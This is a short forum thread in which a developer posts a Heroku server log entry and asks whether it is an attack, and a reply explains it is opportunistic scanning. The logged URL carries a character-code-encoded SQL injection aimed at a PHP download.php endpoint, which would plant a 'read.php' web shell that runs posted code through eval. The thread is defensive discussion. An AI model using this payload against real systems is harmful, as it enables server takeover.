Malicious attacks?

Hi there,

does anyone have any experience with this type of situation.
Here an article about it: link

Not sure I should be worried or need to further investigate.

Server Logs from my Meteor running in Heroku: Nov 13 07:43:04 heroku/router: at=info method=GET path="//plus/download.php?open=1&arrs1=99&arrs1=102&arrs1=103&arrs1=95&arrs1=100&arrs1=98&arrs1=112&arrs1=114&arrs1=101&arrs1=102&arrs1=105&arrs1=120&arrs2=109&arrs2=121&arrs2=97&arrs2=100&arrs2=96&arrs2=32&arrs2=83&arrs2=69&arrs2=84&arrs2=32&arrs2=96&arrs2=110&arrs2=111&arrs2=114&arrs2=109&arrs2=98&arrs2=111&arrs2=100&arrs2=121&arrs2=96&arrs2=32&arrs2=61&arrs2=32&arrs2=39&arrs2=60&arrs2=63&arrs2=112&arrs2=104&arrs2=112&arrs2=32&arrs2=102&arrs2=105&arrs2=108&arrs2=101&arrs2=95&arrs2=112&arrs2=117&arrs2=116&arrs2=95&arrs2=99&arrs2=111&arrs2=110&arrs2=116&arrs2=101&arrs2=110&arrs2=116&arrs2=115&arrs2=40&arrs2=39&arrs2=39&arrs2=114&arrs2=101&arrs2=97&arrs2=100&arrs2=46&arrs2=112&arrs2=104&arrs2=112&arrs2=39&arrs2=39&arrs2=44&arrs2=39&arrs2=39&arrs2=60&arrs2=63&arrs2=112&arrs2=104&arrs2=112&arrs2=32&arrs2=101&arrs2=118&arrs2=97&arrs2=108&arrs2=40&arrs2=36&arrs2=95&arrs2=80&arrs2=79&arrs2=83&arrs2=84&arrs2=91&arrs2=120&arrs2=93&arrs2=41&arrs2=59&arrs2=101&arrs2=99&arrs2=104&arrs2=111&arrs2=32&arrs2=109&arrs2=79&arrs2=111&arrs2=110&arrs2=59&arrs2=63&arrs2=62&arrs2=39&arrs2=39&arrs2=41&arrs2=59&arrs2=63&arrs2=62&arrs2=39&arrs2=32&arrs2=87&arrs2=72&arrs2=69&arrs2=82&arrs2=69&arrs2=32&arrs2=96&arrs2=97&arrs2=105&arrs2=100&arrs2=96&arrs2=32&arrs2=61&arrs2=49&arrs2=57&arrs2=32&arrs2=35"

It’s speculative hacking, but unless you have a download.php and also running php, it’s harmless. Well, except for the extra workload on the server to log it - hopefully small!

2 Likes